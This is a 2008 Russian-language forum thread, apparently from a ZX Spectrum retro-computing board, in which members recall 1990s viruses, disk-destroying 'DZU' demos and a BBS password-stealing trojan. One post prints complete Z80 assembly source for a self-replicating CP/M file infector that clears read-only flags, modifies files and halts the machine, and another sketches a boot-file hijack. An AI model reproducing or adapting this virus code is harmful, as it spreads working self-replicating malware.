PDA

Просмотр полной версии : Вирусы для спектрума? Было такое или я спятил? ;)



jimled
22.01.2008, 00:11
Нет, я не пьющий (с). :)
Не примите меня за сумасшедшего, но я вот вспоминаю середину 90х, и припоминаю о существовании небольших программ (пускай даже смешных и не попадающих по нашим сегодняшним меркам в вирусный раздел), и я отчетливо помню что попытка делать деструктивные программки предпринимались. Так, в частности, однажды ко мне попала в руки дискетка с которой я "бутнулся", и в результате что-то потерло мне игры на другой моей обожаемой дискете. Помню смутно и прогу, которая делала "виртуальный" ресет и не давала нормально грузиться другим программам с ленты - она попросту, вообще их никуда не грузила, а через определенное время имитировала сброс...а раз сброс прошел, то и не нет смысла физически нажимать на кнопку - помню долго она мне крови попила.. :)

Так что, было сему место или нет? :)

rasmer
22.01.2008, 00:24
может у тебя железо глюкало?
хотя вирусы были.... ну безобидные.... да и вирями их назвать было сложно...

Vitamin
22.01.2008, 00:26
В каком-то журнале (может даже ZXFormat) был некий вирус. Рабочий пример и статья в самом журнале. Что делал- не помню :)

AAA
22.01.2008, 00:29
Да были вот: (http://zxaaa.untergrund.net/DISALON.html)
- Wlodek надыбал с Alone Coderom
Диск с демками № 30 (530 kb)

EA GIFT
Внимание!!! EA GIFT содержит в себе деструктивный код!
Запускать только с защищённой от записи дискеты или,
если используется эмулятор, скопируйте в отдельный trd-образ!
Историческая справка: термин "DZU" ("дискозапарывательная
утилита") был введён Стасом Новиковым (STS-ом), он же является
первым автором программ этого "класса". DZU - как правило,
демонстрация, содержащая вредоносный код, портящий 0-ю дорожку диска,
форматирующий диск или т.п. STS обычно предупреждал, что конкретная
демка является DZU . Для ряда его творений предлагались утилиты
анти-DZU, позволяющие восстановить информацию.
В дальнейшем написанием DZU "баловались" и другие авторы.
Короче, я предупредил.

-----------------------------------
Глюк мы с Sey Soft в 1994 делали:
Virus Demo 1,2 (http://zxaaa.untergrund.net/DEMO/virus.zip)

Какая то из них модем гробила, вернее в трубке гудело, если не ошибаюсь.

albion
22.01.2008, 00:31
Мне попался такой прикол:
http://zx.pk.ru/showpost.php?p=88941&postcount=18
Очень резво убивал дискету с которой был запущен.

breeze
22.01.2008, 01:27
На моей памяти было два вируса! я лично писал первый и последний антивирус для них :) один назывался "berezka", второй "red october", деструктивных действий замечено не было, но присобачивался к бейсик загрузчикам и занимал несколько секторов (1 или 2 не помню уже точно) при вечной нехватке места это было критично :)

буду разгребать дискеты - попробую найти этот антивирус, ибо релиза не было - так просто запускной код из асма :) сканил дискеты и лечил :mad:

rasmer
22.01.2008, 01:29
а который с ласт батл шел - как назывался?

breeze
22.01.2008, 01:30
а который с ласт батл шел - как назывался?

во! точно! в ласт батл и был "berezka"!, а второй был кажется в zx-power или он туда случайно попал или я уже путаю что, сорри времени много прошло :o

GibbS
23.01.2008, 04:32
в том самом zx-power и написано про вирусы, также есть статья в каком-то deja vu...

Evgeny Muchkin
23.01.2008, 16:16
Тоже припоминаю.

Встечал вирус, который внедрялся в бейсик файлы и множился после запуска оных; деструктивных действий не помню.

Так же был троян. Могу ошибаться, но сварганил его г-н Фрунзе вроде бы.
Внешне выглядел как дема с вращающимся значком "Анархия" и какой-то музочник незатейливо тяжелый.
Предназначался для СисОпов питерских BBS.
BBS'ный софт (до определнных версий) не чистил память при запуске файлов, соответственно, когда из BBS'ки запускался этот троян он выковыривал из памяти компа user-list со всеми телефонами, паролями и пр., и записывал его в тело файла трояна.
На следующий день злоумышленнег его скачивал с BBS и был, видимо, доволен ;)

ram_scan
24.01.2008, 15:02
Недеструктивный вирус который внедрялся в бейсик-загрузчики и я в свое время писал. Было это году в 93 как мне помнится. Штука достаточно несложная.

drbars
10.02.2008, 13:20
В году так 95-ом помню ковырял загрузчик игры Toi Acid Game от каких-то Новосибирских умельцев. Загрузчик представлял из себя довольно большой basic блок, после запуска которого загрузка продолжалась с бегущей строкой! Долгие попытки раскурочить ни к чему не приводили. А вот при загрузке basic'а без запуска, и последующим запуском run'ом выводился текст: "Ваш компьютер сломан, выключите его и не пытайтесь ремонтировать сами. За ремонтом обращайтесь по адресу XXX". При этом надпись выводилась через прерывания, и также в порт FE сыпался мусор, издавающий треск :) И как по совпадению у меня сгорел проц ;)

Wlodek
12.02.2008, 03:23
Насчёт полноценных вирусов - было одно и в то же время единственное препятствие: отсутствие жёсткого диска. Распространение же "вируса" через дискеты можно было заметить невооружённым глазом.
Тем не менее "программы-шутки :) " всё же в середине 1990-х годов рождались. "Классикой жанра" были DZU (от русского ДЗУ - "ДискоЗапарывательная Утилита"). Их проявление легко обнаруживалось, да и авторы не стремились к секретности - как правило, они прилагали и анти-ДЗУ.
В общем, в обиде, вроде, никто ни на кого не был.
:)

chuck
19.02.2008, 01:38
Имхо, отсутствие жестокого диска не помеха. Помнится как на моей старой тройке без харда, один маленький и в принципе безвредный вирус (играл спикером музыку в 17:00 :)) умудрился расплодиться на всю стопку моих дискет.
А вот то что памяти на Спеке утконос наплакал, да еще и пользователи не стесняются смотреть её содержимое, плюс постоянный аппаратный ресет, да помножить все это на суровую однозадачность... Вот тут-то, кажись, и препятствие к распространению вирусов.

Error404
19.02.2008, 14:39
Имхо, отсутствие жестокого диска не помеха. Помнится как на моей старой тройке без харда, один маленький и в принципе безвредный вирус (играл спикером музыку в 17:00 :)) умудрился расплодиться на всю стопку моих дискет.
А вот то что памяти на Спеке утконос наплакал, да еще и пользователи не стесняются смотреть её содержимое, плюс постоянный аппаратный ресет, да помножить все это на суровую однозадачность... Вот тут-то, кажись, и препятствие к распространению вирусов.

Я в 1996г. по-приколу состряпал вирус для CP/M и скормил его приятелю. :v2_devil: Он его вычислил как раз по "лишним" перемещениям головки дисковода. :v2_rolley Но к тому моменту несколько дискет было уже заражено...

В сохранившейся версии деструктор примитивный: сообщение + di halt, а еще была более навороченная версия, сожавшая резидента (штатно по-CPM-овски: опуская верхнюю границу TPA, или в служебное ОЗУ), которая при выводе на экран и принтер иногда по RND вставляла после запятых артикль "бля" (это плагиат с PC). :)



.z80
;
bdos equ 5
dma equ 0C280h
;
virus: ld hl,mbody
ld de,gogen
ld bc,endgogen-gogen ; подготовить запускалку файла
call lldir
ld a,(counter) ; счетчик копий вируса
and 1FH
push af
inc a
ld (counter),a
;
next: call setdma ; поиск жертвы
ld c,17
call bdosfcb
nfnd: ld hl,fcb+1
ld de,fcb+2
ld bc,7
ld (hl),'?'
call lldir
cp 4
jp nc,nfound
ld c,18
call bdosfcb ; ищем файл, следующий за зараженным
cp 4
jp c,lab1
;
nfound: ld c,17
call bdosfcb
cp 4
jp nc,gogen
lab1: rrca
rrca
rrca ; a:=a*32 - отн. адрес каталога в DMA
ld b,0
ld c,a
ld hl,dma
add hl,bc ; hl= абсолют. адрес каталога в DMA
ld de,fcb
ld bc,9
call lldir ; копию имени из DMA -> в fcb
ld a,(hl)
rla ; c=0 , если файл не установлен в R/O
push af
ld c,30
call c,bdosfcb ; иначе сбросить атрибут R/O
call open
ld c,35
call bdosfcb ; вычислим продвинутый размер файла (размер+1)
ld hl,(fcb+21h) ; в 128-и байтных записях
ld a,h
or l
jp z,nfnd ; Длина файла = 0 => выйти
push hl
inc hl
inc hl
ld b,7
loop3: add hl,hl
dec b
jp nz,loop3
ld (mbody+1),hl ; hl=начало последнего сектора в памяти
;
ld de,dma
call read ; считаем первую запись файла в (0c280h)
ld de,dma+80h
call read ; считаем вторую запись файла в (0c300h)
ld de,dma+100h
call read ; считаем 3-ю запись файла в (0c380h)
;
call open ; открыть файл
ld de,100h
call write ; записать модифицированный 1-й сектор
ld de,180h
call write ; записать модифицированный 2-й сектор
ld de,200h
call write ; записать модифицированный 3-й сектор
pop hl
ld de,dma
call append1 ; добавить к файлу запись с адр. 0c280h
ld de,dma+80h
call append ; добавить к файлу запись с адр. 0c300h
ld de,dma+100h
call append ; добавить к файлу запись с адр. 0c380h
ld c,16
call bdosfcb ; закрыть файл
;
pop af
jp nc,killer ; переход , если файл не был R/O
ld hl,(fcb+9)
ld a,(hl)
or 80h
ld (hl),a
ld c,30
call bdosfcb ; иначе установить атрибут R/O
;
killer: pop af ; п/п деструктивного действия
jp nz,gogen
ld de,orion
ld c,9
call bdos
di ; вешаем машину
halt
orion: db 1fh,'Hello! I',39,'m Gogen. Good luck!!!','$'
counter:db 1
;
open: LD HL,FCB+12
LD DE,FCB+13
LD BC,17H
LD (HL),0
call lldir
ld c,15
bdosfcb:ld de,fcb
jp bdos ; открыть файл
;
setdma: ld de,dma
setpdp: ld c,26
jp bdos ; установим адрес буфера DMA
;
read: call setpdp
ld c,20
jp bdosfcb ; считаем запись файла в DMA (по DE)
;
write: call setpdp
ld c,21
jp bdosfcb ; пишем запись из DMA (по DE) в файл
;
append: ld hl,(fcb+21h)
inc hl
append1:ld (fcb+21h),hl
call setpdp
ld c,34
jp bdosfcb ; добавить запись из DMA (по DE) к файлу
;
lldir: push af
mldir: ld a,(hl)
ld (de),a
inc hl
inc de
dec bc
ld a,b
or c
jp nz,mldir
pop af
ret
;
mbody:
.phase 0edh
gogen: ld hl,100h
ld de,100h
ld bc,180h
ldirr: ld a,(hl)
ld (de),a
inc hl
inc de
dec bc
ld a,b
or c
jp nz,ldirr
endgogen:
.dephase
;
fcb: ds 9h,0
db 'COM'
ds 18h,0

end




Raydac
19.02.2008, 17:05
меня помню интересовала идея именно наличия концептуальной возможности написания вирусов для спектрума.. пришел к выводу, что достаточно несложная задача если использовать психологические особенности человека, иммитируя вирусом сбро компьютера, так как никто после этого как правило кнопку RESET повторно не нажимает :) давая возможность к резидентному существованию кода злоумышленника в памяти

CPLx
19.02.2008, 21:41
Хотел сделать вирус в 1996. Ничего не получилось (глюки и всё такое :)). Должен был "паразитировать" на конкретном буте, т.е. использовать его для размножения.
Как сделать чтобы он мог прикрепляться к любому файлу, запускаться при запуске этого файла и при этом не нарушать работоспособность зараженного файла я придумать не смог. Чтобы вирус мог перебрасываться с диска на диск его нужно цеплять к командеру, либо к буту. Вот я тогда что-то решил к буту прицепить (до командера, видать, не додумался :)). В любом случае вирус получается заточенным под конкретную программу/программы которые он будет использовать для размножения.
Имхо, действительно мешал аппаратный reset (систематический. Любая прога выключалась именно им. Смерть вирусу гарантирована). Это значит что у обычных юзеров вирус размножится не мог.

Добавлено через 5 минут
А на писюке всё сделано для комфортного размножения вирусов, потому они на нём и есть. Недавно врубил флэшку, зашел на нее через "мой компутер", и сама винда запустила вирус. Фича называется "autorun". :) Все вирусы, что у меня были, использовали эту встроенную возможность винды для своего запуска. Сам я эту фичу никогда не использую. Только вирусы используют.

ALEXEY.GORDEEV
15.04.2008, 18:26
Я вот тут нарыл:
http://vx.org.ua/exotic.php
В самом низу есть пара вирей для ZX, что делают, пока сам не смотрел, но попробую на эмуле (ввиду отсутствия реала с тырдосом :) )

Добавлено через 3 минуты
Ба, они русские :):D
На буржуйский сайт каким то образом попали :)

zxrat
15.04.2008, 20:51
Тоже в своё время баловались. Самое элементарное boot в boot_ переименовать (Вместо _ можно не видимый символ из псевдографики забацать). А вирус в качестве boot.B сделать. Ну и соответственно ченить делать, а потом грузить boot_. Надеюсь идея понятна....